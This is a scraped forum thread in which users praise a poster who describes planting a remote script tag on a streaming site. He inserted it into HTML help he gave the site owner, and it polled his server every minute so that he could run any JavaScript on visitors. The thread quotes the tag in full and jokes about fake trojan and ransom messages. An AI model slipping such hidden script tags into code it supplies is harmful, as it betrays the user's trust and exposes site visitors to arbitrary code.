Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
Schadenboner
Aug 15, 2011

by Shine

Tiny Bug Child, you done good son.

Adbot
ADBOT LOVES YOU

Peanut and the Gang
Aug 24, 2009

by exmarx

Rufo posted:

someone's managed to put

code:
<p><script src="http://www.ustreamtally.vacau.com/update.js?s=6743479"></script></div>
on http://onlyonetv.com/watch-live/

it's running the latest version of wordpress so god knows. own up + get mad props

yeah that was me. getting the code in there wasnt that timthumb hack (i dont think onlyonetv has that installed) or anything exciting, just social engineering. about 2 months back he asked for help to make the chat show to the right of the video instead of below it. i gave him the html code, but added in that script tag.
then i made that script tag poll for updates every minute. so it executed whatever javascript code i put up. so it was p much putting up fun jquery code and waiting up to a minute for everyone to get it.

johndis
Jun 23, 2009

by Ozmaugh

barbarianbob posted:

yeah that was me. getting the code in there wasnt that timthumb hack (i dont think onlyonetv has that installed) or anything exciting, just social engineering. about 2 months back he asked for help to make the chat show to the right of the video instead of below it. i gave him the html code, but added in that script tag.
then i made that script tag poll for updates every minute. so it executed whatever javascript code i put up. so it was p much putting up fun jquery code and waiting up to a minute for everyone to get it.

i luv u

FCKGW
May 21, 2006

barbarianbob posted:

CrazyLittle
Sep 11, 2001

Clapping Larry

Dans Macabre
Apr 24, 2004

barbarianbob posted:

hello from the goldmine

Only registered members can see post attachments!

Sneaking Mission
Nov 11, 2008

cozpop redux

graph
Nov 22, 2006

aaag peanuts

barbarianbob posted:

:ocelot: 55555

graph
Nov 22, 2006

aaag peanuts
this guy has been talking to this chick for like 2 loving hours

she eventually made this face and walked away

MORE CURLY FRIES
Apr 8, 2004

barbarianbob posted:

duTrieux.
Oct 9, 2003

barbarianbob posted:

mr_jim
Oct 30, 2006

OUT OF THE DARK

barbarianbob posted:

yospos mvp

duTrieux.
Oct 9, 2003

graph posted:

this guy has been talking to this chick for like 2 loving hours

she eventually made this face and walked away

i hope to god that somebody was recording or this gets put up later because there was a moment where she was looking directly at the camera and the look in her eyes... gently caress

axolotl farmer
May 17, 2007

Now I'm going to sing the Perry Mason theme

are the Planet Money guys there?

nanerpuss
Aug 6, 2005

voudrais-tu une banane, mon amie?

barbarianbob posted:

will you have my children you saint

johndis
Jun 23, 2009

by Ozmaugh

mr_jim posted:

yospos mvp

seriosuly

got dat wmd was literally there and didnt top the bob

johndis
Jun 23, 2009

by Ozmaugh
"oh theres a fat guy in my way" :cmon:

got dat wmd
Apr 28, 2009
did no one see the segment? i know there's two cameras but i wouldnt think they would cut away from the conference to show people standing in the hall. there was also a 4chan mask kid there

CrazyLittle
Sep 11, 2001

Clapping Larry

johndis posted:

got dat wmd was literally there

I'm starting to doubt this part.

toxicitysquared
Nov 12, 2007

:jiggled:
Jiggled Again
:jiggled:

barbarianbob posted:

:worship:

MORE CURLY FRIES
Apr 8, 2004

got dat wmd posted:

did no one see the segment? i know there's two cameras but i wouldnt think they would cut away from the conference to show people standing in the hall. there was also a 4chan mask kid there

theres only one working stream the other one is a four minute recorded clip

FCKGW
May 21, 2006

got dat wmd posted:

there was also a 4chan mask kid there

ahahahahahahahahahahahahahahahahahahaahahahahaahahah

MORE CURLY FRIES
Apr 8, 2004

they have literally been streaming a nerd weirding out a girl for two hours in a hallway

got dat wmd
Apr 28, 2009

CrazyLittle posted:

I'm starting to doubt this part.

im not there anymore, will be back tonight and tomorrow depending on who wants to go see war horse

johndis
Jun 23, 2009

by Ozmaugh
i wanna go see warhorse

FCKGW
May 21, 2006

hply poo poo i forgot this is a full 4 day spergfest

graph
Nov 22, 2006

aaag peanuts

duTrieux posted:

i hope to god that somebody was recording or this gets put up later because there was a moment where she was looking directly at the camera and the look in her eyes... gently caress

yeah that was a half second after that screengrab

it was pretty glorious

Seth Pecksniff
May 27, 2004

can't believe shrek is fucking dead. rip to a real one.

barbarianbob posted:

i'm just chiming in to say holy crap you are amazing :worship:

Rufus Ping
Dec 27, 2006

I'm a Friend of Rodney Nano

barbarianbob posted:

:rms: 5

gay devil
Aug 20, 2009

barbarianbob posted:

i love you

Tiny Bug Child
Sep 11, 2004

Avoid Symmetry, Allow Complexity, Introduce Terror

barbarianbob posted:

you are fantastic

text editor
Jan 8, 2007

barbarianbob posted:

You glorious bastard

fuctifino
Jun 11, 2001

barbarianbob posted:

You glorious glorious bastard.

How about throwing up a fake wallet-stealing trojan message during the next show?

MORE CURLY FRIES
Apr 8, 2004

fuctifino posted:

You glorious glorious bastard.

How about throwing up a fake wallet-stealing trojan message during the next show?

we have kindapped bruce. to free him send 500 btc to 18yND#14yWH5231wKq

maniacdevnull
Apr 18, 2007

FOUR CUBIC FRAMES
DISPROVES SOFT G GOD
YOU ARE EDUCATED STUPID

barbarianbob posted:

stuffed crust punk
Oct 8, 2004

by LITERALLY AN ADMIN
wtf did barbarianbob do

aeverous
Nov 13, 2009

barbarianbob posted:

drat

killhamster
Apr 15, 2004

SCAMMER

got dat wmd posted:

there was also a 4chan mask kid there

did you punch him

why didn't you punch him

Dans Macabre
Apr 24, 2004

4 days... I don't have enough laughs to last...

Adbot
ADBOT LOVES YOU

that awful man
Feb 18, 2007

YOSPOS, bitch

barbarianbob posted:

this owns